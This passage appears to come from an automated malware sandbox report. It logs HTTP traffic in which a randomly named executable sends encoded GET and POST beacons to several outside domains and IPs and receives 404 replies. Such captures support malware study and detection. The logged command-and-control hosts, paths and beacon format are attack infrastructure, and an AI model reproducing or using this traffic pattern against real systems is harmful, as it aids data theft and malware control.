9iA9IqHqBo+bZK8Ke2erhW [TRUNCATED]
                                                                      Dec 10, 2024 15:16:59.536801100 CET691INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:16:59 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      24192.168.2.114973635.220.176.144805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:00.723587036 CET362OUTGET /7yhf/?x2q=OF4p1YkyIdfCe7eLhNmLS9a71obvkkx5m6SnSx71uUBEXBHxoh5TWtGHsn9J2PYNIykLYH3RiXpaFAzmPgGr5qIxSDZKvplZ+L2zC6/y242QbNTV2zLWhg0=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.bienmaigrir.info
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:02.208415031 CET691INHTTP/1.1 404 Not Found
                                                                      Server: nginx
                                                                      Date: Tue, 10 Dec 2024 14:17:01 GMT
                                                                      Content-Type: text/html
                                                                      Content-Length: 548
                                                                      Connection: close
                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED]
                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      25192.168.2.1149737101.35.209.183805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:08.395220995 CET623OUTPOST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 4a 57 5a 73 31 34 6d 6f 77 37 59 30 6f 41 6b 43 4c 71 57 55 38 67 31 72 70 58 74 2b 75 48 77 79 56 49 63 68 46 69 31 56 6b 62 54 76 30 72 6b 7a 66 6a 6a 77 4f 42 56 42 52 67 5a 69 2f 2f 70 58 53 4f 34 2b 65 4c 73 78 78 5a 44 31 67 6c 57 4d 78 58 46 39 6b 61 31 47 42 6c 55 61 59 34 71 35 41 54 68 43 72 41 65 68 77 61 61 50 75 75 42 2f 4d 67 70 67 36 4c 63 59 45 38 56 73 52 75 51 49 36 70 4c 4c 49 56 52 39 75 4c 53 59 4a 36 41 36 30 42 6f 65 49 38 41 2f 70 74 44 30 63 42 35 69 50 6e 57 39 56 70 7a 33 4d 62 2b 44 4d 32 65 41 53 76 48 37 41 41 3d 3d
                                                                      Data Ascii: x2q=ruscVq1iLK4KJWZs14mow7Y0oAkCLqWU8g1rpXt+uHwyVIchFi1VkbTv0rkzfjjwOBVBRgZi//pXSO4+eLsxxZD1glWMxXF9ka1GBlUaY4q5AThCrAehwaaPuuB/Mgpg6LcYE8VsRuQI6pLLIVR9uLSYJ6A60BoeI8A/ptD0cB5iPnW9Vpz3Mb+DM2eASvH7AA==
                                                                      Dec 10, 2024 15:17:09.950735092 CET427INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:09 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      26192.168.2.1149738101.35.209.183805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:11.061856031 CET643OUTPOST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 67 79 56 6f 4d 68 44 58 42 56 70 37 54 76 38 4c 6b 72 52 44 6a 33 4f 42 59 38 52 68 6c 69 2f 2f 39 58 53 4b 30 2b 66 34 30 77 78 4a 44 7a 2b 46 57 4f 2f 33 46 39 6b 61 31 47 42 68 31 50 59 35 43 35 41 43 52 43 6b 45 71 69 35 36 61 4d 70 75 42 2f 49 67 70 38 36 4c 63 36 45 35 6f 78 52 73 59 49 36 6f 37 4c 4c 48 70 36 39 72 54 54 57 71 42 7a 6c 6a 74 41 42 75 52 4f 74 4c 50 34 54 69 64 68 4b 68 62 6e 46 4b 36 67 50 49 32 42 59 51 2f 77 62 65 69 79 62 41 6a 62 48 68 6c 55 59 67 4a 41 41 35 4a 36 62 59 67 6d 42 4d 41 3d
                                                                      Data Ascii: x2q=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSgyVoMhDXBVp7Tv8LkrRDj3OBY8Rhli//9XSK0+f40wxJDz+FWO/3F9ka1GBh1PY5C5ACRCkEqi56aMpuB/Igp86Lc6E5oxRsYI6o7LLHp69rTTWqBzljtABuROtLP4TidhKhbnFK6gPI2BYQ/wbeiybAjbHhlUYgJAA5J6bYgmBMA=
                                                                      Dec 10, 2024 15:17:12.526433945 CET427INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:12 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      27192.168.2.1149739101.35.209.183805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:13.729052067 CET1656OUTPOST /wu7k/ HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.yc791022.asia
                                                                      Content-Length: 1232
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.yc791022.asia/wu7k/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 72 75 73 63 56 71 31 69 4c 4b 34 4b 54 32 70 73 30 66 79 6f 33 62 59 33 32 51 6b 43 45 4b 57 51 38 67 35 72 70 57 5a 75 75 53 6f 79 56 37 30 68 41 77 64 56 6f 37 54 76 79 72 6b 6f 52 44 6a 6d 4f 42 41 77 52 68 70 63 2f 38 46 58 55 70 38 2b 4b 35 30 77 36 4a 44 7a 32 6c 57 4c 78 58 45 6e 6b 65 52 4b 42 6c 5a 50 59 35 43 35 41 42 4a 43 6a 51 65 69 31 61 61 50 75 75 41 72 4d 67 70 59 36 4c 55 51 45 34 34 68 51 63 34 49 37 49 72 4c 48 53 46 36 2b 4c 54 52 56 71 42 72 6c 69 52 68 42 75 4d 78 74 4c 54 65 54 68 4e 68 4c 6c 2b 64 52 71 2b 32 56 6f 72 77 62 51 7a 6a 57 63 57 33 53 42 33 6a 4e 53 6c 42 4d 48 31 49 4a 38 38 33 41 5a 77 46 53 59 6e 6e 6b 51 44 79 78 41 59 73 6a 71 47 49 43 52 66 4e 31 70 58 41 41 47 63 39 69 64 61 69 58 6d 2f 4f 72 71 77 6e 62 72 56 41 63 49 36 7a 4c 45 6e 4c 41 66 4d 4b 53 33 46 70 6c 77 6e 6c 61 58 53 49 73 78 6d 72 68 64 50 4a 65 43 48 37 34 48 47 4e 61 57 79 73 30 52 4c 4c 41 66 52 38 79 71 4c 71 65 41 56 2b 67 53 75 73 36 62 46 32 41 78 38 4c 4b 45 4b 51 31 4d [TRUNCATED]
                                                                      Data Ascii: x2q=ruscVq1iLK4KT2ps0fyo3bY32QkCEKWQ8g5rpWZuuSoyV70hAwdVo7TvyrkoRDjmOBAwRhpc/8FXUp8+K50w6JDz2lWLxXEnkeRKBlZPY5C5ABJCjQei1aaPuuArMgpY6LUQE44hQc4I7IrLHSF6+LTRVqBrliRhBuMxtLTeThNhLl+dRq+2VorwbQzjWcW3SB3jNSlBMH1IJ883AZwFSYnnkQDyxAYsjqGICRfN1pXAAGc9idaiXm/OrqwnbrVAcI6zLEnLAfMKS3FplwnlaXSIsxmrhdPJeCH74HGNaWys0RLLAfR8yqLqeAV+gSus6bF2Ax8LKEKQ1MV69cYI1/QEJhBxFvtkx1/930loOvM8pF/TGhcBBNBMURfmYE1fuRhjWef6ziGEiYT54t3k48/tcLJgCzM8ET1Fl6voq2uJ1Xg888sUB9Y32QhflXFtvrH176Q8U4dDwL8mi6K7a2sK0coezQI6Wwbp2m6LnYnDVYa8HsYDGTRt7B+Lty8gBarSmHDGhasyliu01ens6oRUniI+Y6YMzjn3lMyCoWDTD8QjaohNFYAdQIkl7p8X7WNwObDHkEnfo9IRdoMei5cM2mpAVZkaix9BnemrTV0BsSe0KtsJCn7+Bmwn91h2FlFw5lqQt43cSVjI6qruNWZQcv7oBSWor6y7PXFOAYiJvBpiTDNRdyN14MKuSDk3yi1OlXwBgadlrxsTpThg2IDaUFBEMSX3+bQq5CKO7KrXhmFUoThoaD2TbdQ1tmaqHeBYW1ymdLxW/IeDcxvw+XM09nmZ+dGRRrl7ti/QRKKrqgnjalmKpB6Ux1nZu6063RtoGM1XXy4jPmrj18BdqAaYoDiSINuafn/iO6rFWFnI6PQCk2T/T8H2BlqPkdNI9KqHLBIi3P1eGmEXgqhn73dabFFcIzctc3b6h9fAn0dxae2TFoG1+woEOJNeA7QdstBL/AfA+W4hI4s1TooPh4T114U90/Ym8kKeAu7nDAOr3j1a [TRUNCATED]


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      28192.168.2.1149740101.35.209.183805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:16.382314920 CET359OUTGET /wu7k/?x2q=msE8We8dGqsfRntWrquh0bsz2FoIUbe83S1Gvm9i1konD6ZBc3B28v2M3s5YR0KKFS9CfgF+yd8Vab4bVKVPv+PT22eq81M1kOVVHAZEZoSUQiJLk0TbwLs=&Gn6D=5fNLN8qhqB3P HTTP/1.1
                                                                      Host: www.yc791022.asia
                                                                      Accept: */*
                                                                      Accept-Language: en-us
                                                                      Connection: close
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Dec 10, 2024 15:17:17.873094082 CET427INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 10 Dec 2024 14:17:17 GMT
                                                                      Server: Apache
                                                                      Content-Length: 263
                                                                      Connection: close
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 79 63 37 39 31 30 32 32 2e 61 73 69 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.yc791022.asia Port 80</address></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      29192.168.2.1149741108.181.189.7805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:23.357057095 CET623OUTPOST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
                                                                      Content-Length: 200
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 6a 50 6d 75 51 49 77 68 61 48 2f 6c 63 73 4d 35 4f 50 35 44 56 62 65 44 2b 70 58 4e 43 63 46 45 6f 73 56 51 4e 5a 59 7a 59 43 6f 6c 7a 75 73 5a 33 33 6d 66 2b 74 64 4b 69 38 32 39 37 4b 4a 57 78 68 6a 6a 64 68 77 42 36 66 6e 50 58 74 6e 6d 39 31 73 49 72 74 34 41 50 6d 75 79 73 46 30 57 50 61 36 78 71 4c 78 35 73 32 62 30 64 32 74 39 35 4a 54 6b 4d 70 4c 41 39 76 54 64 6f 41 2f 6f 74 50 33 73 48 47 7a 6a 6f 30 50 72 52 53 31 58 56 6c 44 6b 33 73 59 77 61 6b 4c 49 4c 68 56 49 66 50 37 4f 78 54 48 6e 41 62 61 66 31 6f 68 33 36 6f 41 6f 72 77 3d 3d
                                                                      Data Ascii: x2q=wqjgxK/3qMsOjPmuQIwhaH/lcsM5OP5DVbeD+pXNCcFEosVQNZYzYColzusZ33mf+tdKi8297KJWxhjjdhwB6fnPXtnm91sIrt4APmuysF0WPa6xqLx5s2b0d2t95JTkMpLA9vTdoA/otP3sHGzjo0PrRS1XVlDk3sYwakLILhVIfP7OxTHnAbaf1oh36oAorw==
                                                                      Dec 10, 2024 15:17:24.658584118 CET279INHTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:24 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close
                                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
                                                                      Data Ascii: a
                                                                      Dec 10, 2024 15:17:24.658595085 CET713INData Raw: 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e
                                                                      Data Ascii: 2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      30192.168.2.1149742108.181.189.7805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:26.035084009 CET643OUTPOST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
                                                                      Content-Length: 220
                                                                      Connection: close
                                                                      Cache-Control: no-cache
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Referer: http://www.jalan2.online/ykgd/
                                                                      User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                      Data Raw: 78 32 71 3d 77 71 6a 67 78 4b 2f 33 71 4d 73 4f 73 50 32 75 57 70 77 68 64 6e 2f 6d 51 4d 4d 35 63 50 35 50 56 62 53 44 2b 6f 53 56 43 4f 52 45 6d 6f 52 51 4d 64 73 7a 62 43 6f 6c 37 4f 73 63 36 58 6d 45 2b 74 52 34 69 39 36 39 37 4b 4e 57 78 67 54 6a 64 53 6f 4f 34 50 6e 42 50 64 6e 6b 69 46 73 49 72 74 34 41 50 6d 37 36 73 42 59 57 50 70 69 78 71 75 64 36 68 57 62 33 4d 32 74 39 6f 35 53 74 4d 70 4c 79 39 72 61 4b 6f 44 58 6f 74 50 48 73 65 33 7a 67 6d 30 50 78 56 53 30 65 62 56 71 64 76 74 74 38 43 56 48 30 43 44 63 74 58 70 32 55 68 77 4f 77 44 49 53 64 68 4f 41 48 7a 5a 6c 68 77 31 37 37 52 55 6a 39 4a 6b 6a 44 43 4e 37 4b 53 69 52 4d 49 36 41 3d
                                                                      Data Ascii: x2q=wqjgxK/3qMsOsP2uWpwhdn/mQMM5cP5PVbSD+oSVCOREmoRQMdszbCol7Osc6XmE+tR4i9697KNWxgTjdSoO4PnBPdnkiFsIrt4APm76sBYWPpixqud6hWb3M2t9o5StMpLy9raKoDXotPHse3zgm0PxVS0ebVqdvtt8CVH0CDctXp2UhwOwDISdhOAHzZlhw177RUj9JkjDCN7KSiRMI6A=
                                                                      Dec 10, 2024 15:17:27.261723995 CET992INHTTP/1.1 404 Not Found
                                                                      content-type: text/html
                                                                      cache-control: private, no-cache, max-age=0
                                                                      pragma: no-cache
                                                                      date: Tue, 10 Dec 2024 14:17:27 GMT
                                                                      server: LiteSpeed
                                                                      content-encoding: gzip
                                                                      vary: Accept-Encoding
                                                                      transfer-encoding: chunked
                                                                      connection: close
                                                                      Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a 32 62 64 0d 0a 65 54 6b 6b db 30 14 fd 5e d8 7f b8 4d 19 b4 10 27 76 ea b0 61 3b 66 63 0f 36 18 5b a1 85 b1 8f b2 75 1d 89 ca 92 27 29 af 95 fe f7 5d d9 49 9a b6 16 d8 92 7c 75 74 ee 39 57 2a ce 3f ff fa 74 f7 e7 e6 0b 08 df aa f2 ac 08 1f 70 7e a7 70 31 12 28 97 c2 67 49 1c bf 1d 85 5f c8 38 7d 5a f4 0c 34 6b 29 60 2d 71 d3 19 eb 47 50 1b ed 51 fb c5 68 23 b9 17 0b 8e 6b 59 63 d4 0f c6 20 b5 f4 92 a9 c8 d5 8c 60 93 31 38 61 a5 be 8f bc 89 1a e9 17 da 04 74 2f bd c2 12 d2 38 85 9f c6 c3 57 b3 d2 fc cd 59 31 1d e6 8b 9e 52 f9 a1 45 2e 19 5c 76 16 1b b4 2e aa 8d 32 96 70 05 b6 98 71 66 ef af 1e 2a c3 77 0f 15 ab ef 97 36 40 0c 21 d9 45 1c c7 e7 b2 0d 64 99 f6 8f 8f c5 74 00 2c a6 fb ac c2 b2 43 de c3 12 b8 48 d3 34 87 96 d9 a5 d4 59 9c 37 94 62 06 da d8 96 29 48 d2 6e 3b 9d c5 dd 16 3e 5a 4a 6d 0c df 50 ad d1 cb 9a 51 76 4c bb c8 a1 95 4d 0e 27 12 e6 f0 8a 15 5c 34 4d 93 87 ec b9 5c bf 50 9d ad bc a1 dd a5 8e 9e 61 8c 4a 08 cf e9 02 8f 5b 1f 31 25 97 3a 83 [TRUNCATED]
                                                                      Data Ascii: a2bdeTkk0^M'va;fc6[u')]I|ut9W*?tp~p1(gI_8}Z4k)`-qGPQh#kYc `18at/8WY1RE.\v.2pqf*w6@!Edt,CH4Y7b)Hn;>ZJmPQvLM'\4M\PaJ[1%:L@C|>&"%dgbt*gct\]9B$@%rfUR0l(N2)= lMh<*Y:tyT+,ZF9F{^L;}"h8gY>q.2hkk^O$NhuB+c9>(:.+v6IW`l2xcxz+:}_-ohWvT$dm47/kDa-4_Jt] %6$YvLi>Fj3bC{.~p/+a0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      31192.168.2.1149743108.181.189.7805804C:\Program Files (x86)\oeSEyonIhOPPjnMpzLzvidfyZBcWSVVNWdJEZJldciZKroByQK\duvyEsVvTpq.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Dec 10, 2024 15:17:28.697606087 CET1656OUTPOST /ykgd/ HTTP/1.1
                                                                      Host: www.jalan2.online
                                                                      Accept: */*
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-us
                                                                      Origin: http://www.jalan2.online
